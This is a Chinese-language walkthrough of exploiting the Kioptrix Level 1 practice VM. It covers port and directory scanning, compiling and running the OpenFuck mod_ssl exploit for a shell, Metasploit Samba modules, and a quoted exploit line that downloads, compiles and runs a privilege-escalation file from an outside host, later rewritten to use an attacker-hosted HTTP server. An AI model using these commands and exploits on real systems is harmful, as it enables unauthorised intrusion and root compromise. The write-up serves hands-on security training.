Kioptrix Level 1
Kioptrix这个系列靶机默认是桥接模式,如果我们kali使用NAT是扫描不到靶机的,通过VM的靶机网络设置也不能更改成功。
解决方式:每次下载好靶机先不导入VM,如果已经导入,需要“移除”靶机;然后通过修改靶机目录中的vm配置文件,删除所有ethernet0为首的行,之后,导入VM中,重新添加网络适配器并选择NAT模式,这样kali就能扫描到靶机了
kali IP:192.168.1.128
靶机IP:192.168.1.130
sudo nmap --min-rate 10000 -p- 192.168.1.130
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-17 10:27 CST
Nmap scan report for 192.168.1.130
Host is up (0.0023s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
1024/tcp open kdm
sudo nmap -sT -sV -O -p22,80,111,139,443,1024 192.168.1.130
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-17 10:40 CST
Nmap scan report for 192.168.1.130
Host is up (0.00036s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: yMYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
mod_ssl,OpenSSL,rpcbind,Samba 都可以进行尝试
搜索了一下rpcbind只有拒绝服务。
sudo nmap -sU -p22,80,111,139,443,1024 192.168.1.130
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-17 10:42 CST
Nmap scan report for 192.168.1.130
Host is up (0.00025s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
111/udp open rpcbind
139/udp closed netbios-ssn
443/udp closed https
1024/udp closed unknown
UDP扫描一下有没有遗漏的服务
访问80端口和443端口,发现网络架构相同,和nmap扫描出的服务相同。
扫描目录:
sudo dirb http://192.168.1.130
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Aug 18 10:18:03 2023
URL_BASE: http://192.168.1.130/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.130/ ----
+ http://192.168.1.130/~operator (CODE:403|SIZE:273)
+ http://192.168.1.130/~root (CODE:403|SIZE:269)
+ http://192.168.1.130/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.1.130/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.1.130/manual/
==> DIRECTORY: http://192.168.1.130/mrtg/
==> DIRECTORY: http://192.168.1.130/usage/
---- Entering directory: http://192.168.1.130/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.130/mrtg/ ----
+ http://192.168.1.130/mrtg/index.html (CODE:200|SIZE:17318)
---- Entering directory: http://192.168.1.130/usage/ ----
+ http://192.168.1.130/usage/index.html (CODE:200|SIZE:4261)
radhat的默认首页和配置文档 没有利用点
看了一下apache 1.3.20有什么漏洞可以利用
searchsploit apache 1.3.20
mod_ssl=2.8.4<2.8.7,尝试使用
searchsploit -m 47080.c
Exploit: Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)
URL: https://www.exploit-db.com/exploits/47080
Path: /usr/share/exploitdb/exploits/unix/remote/47080.c
File Type: C source, ASCII text
gcc -o exploit 47080.c -lcrypto
47080.c:21:10: fatal error: openssl/ssl.h: 没有那个文件或目录
21 | #include <openssl/ssl.h>
| ^~~~~~~~~~~~~~~
compilation terminated.
下载依赖库之后重新编译
exploit中符合要求有0x6a,0x6b
sudo ./exploit 0x6a 192.168.1.130 -c 50
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
Good Bye!
sudo ./exploit 0x6b 192.168.1.130 -c 50
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--23:19:52-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443...
dl.packetstormsecurity.net: Host not found.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$
检查权限
uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
whoami;id
apache
uid=48(apache) gid=48(apache) groups=48(apache)
百度说是这个.c文件获取外网文件被墙 导致获取的不是root权限
Samba尝试 尝试了下 只有最有一个对139端口进行攻击 其他的利用模块都是针对mamba的服务端口443进行攻击的
use exploit/linux/samba/
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow
1 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
2 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
3 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
4 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
一般来说 系统赋予smb服务为root权限
samba/setinfopolicy_heap 信息策略审计时间堆溢出
Samba chain_reply内存损坏漏洞:该漏洞利用代码会损坏Samba 3.3.13以前版本中分配给响应数据包的内存,可通过传递超过目标缓冲区大小的值实现。
samba/is_known_pipename CVE-2017-7494,Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。Samba 允许连接一个远程的命名管道,并且在连接前会调用 is_known_pipename() 函数验证管道名称是否合法。在 is_known_pipename() 函数中,pipename并没有检查管道名称中的部分特殊字符,加载了使用该名称的动态链接库。导致攻击者可以构造一个恶意的动态链接库文件,执行任意代码。
Samba lsa_io_trans_names Heap Overflow 堆溢出
Samba trans2open溢出:这是Samba2.2.0版本到2.2.8版本中普遍存在的一个缓冲区溢出漏洞,其工作原理是利用没有noexec栈选项的x86 Linux机器中的漏洞。
配置好后run借助samba直接能拿到root权限
继续之前的mod_ssl进行,根据网上的思路 可以在128访问外网下载 exploit中130需访问的外网文件,通过更改exploit中,使130访问128临时开启的80端口下载文件,执行expoit获取root权限。
nl 47080.c|grep ptrace
8 * Note: if required, host ptrace and replace wget target
308 #define COMMAND2 "unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit; \n"
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
--2023-08-18 09:29:59-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
正在解析主机 dl.packetstormsecurity.net (dl.packetstormsecurity.net)... 198.84.60.200
正在连接 dl.packetstormsecurity.net (dl.packetstormsecurity.net)|198.84.60.200|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:3921 (3.8K) [text/x-csrc]
正在保存至: “ptrace-kmod.c”
ptrace-kmod.c 100%[================================================================>] 3.83K --.-KB/s 用时 0s
2023-08-18 09:30:01 (131 MB/s) - 已保存 “ptrace-kmod.c” [3921/3921])
编写 47080.c ,然后重新编译,临时开启128的80服务,同时执行exploit
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.1.130 - - [18/Aug/2023 09:37:16] "GET /ptrace-kmod.c HTTP/1.0" 200 -